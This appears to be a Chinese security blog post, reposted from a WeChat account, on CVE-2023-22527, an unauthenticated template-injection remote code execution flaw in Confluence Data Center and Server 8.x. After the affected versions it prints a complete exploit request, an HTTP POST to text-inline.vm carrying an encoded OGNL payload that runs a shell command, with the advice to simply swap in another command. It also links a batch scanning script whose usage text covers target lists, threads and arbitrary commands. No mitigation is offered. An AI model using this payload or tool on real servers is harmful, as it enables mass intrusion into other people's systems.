Confluence是一款建基于网络企业维基 (collaboration software) 的软件,由澳洲软件公司艾特莱森Atlassian所开发。是专业的企业知识管理与协同软件,强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。Confluence 独立软件内建Tomcat网页浏览器与hsql数据库,同时也支持其它数据库。Confluence已整合为群组软件的一部分,可以搭配JIRA或其他艾特莱森软件产品,包括 Bamboo, Clover,Crowd, Crucible,和Fisheye 使用。
CVE-2023-22527
漏洞描述:
旧版本 Confluence Data Center 和 Server 的text-inline.vm处存在模板注入,攻击者无需身份验证即可利用此漏洞构造远程代码执行。
影响版本:
Confluence Data Center and Server 8.0.x
Confluence Data Center and Server 8.1.x
Confluence Data Center and Server 8.2.x
Confluence Data Center and Server 8.3.x
Confluence Data Center and Server 8.4.x
8.5.0 <= Confluence Data Center and Server <= 8.5.3
漏洞复现:
直接改命令就行
POST /template/aui/text-inline.vm HTTP/1.1
Host:xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/115.0.0.0 Iron Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 368
Connection: close
label=aaa%5Cu0027%2B%23request.get%28%5Cu0027.KEY_velocity.struts2.context%5Cu0027%29.internalGet%28%5Cu0027ognl%5Cu0027%29.findValue%28%23parameters.poc%5B0%5D%2C%7B%7D%29%2B%5Cu0027&poc=%40org.apache.struts2.ServletActionContext%40getResponse%28%29.setHeader%28%5Cu0027Cmd-Ret%5Cu0027%2C%28new+freemarker.template.utility.Execute%28%29%29.exec%28%7B%22id%22%7D%29%29
批量扫描脚本:
所有非法攻击本人概不负责
https://github.com/YongYe-Security/CVE-2023-22527
usage: python3 CVE-2023-22527.py -u <target> [-f <file>] -c <cmd>
options:
-h, --help show this help message and exit
-u TARGET, --target TARGET
Target URL
-f FILE, --file FILE URL file
-c CMD, --cmd CMD Commands to execute
-t THREAD, --thread THREAD
Number of threads
原文始发于微信公众号(YongYe 安全实验室):CVE-2023-22527__Confluence-RCE 附批量扫描脚本
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论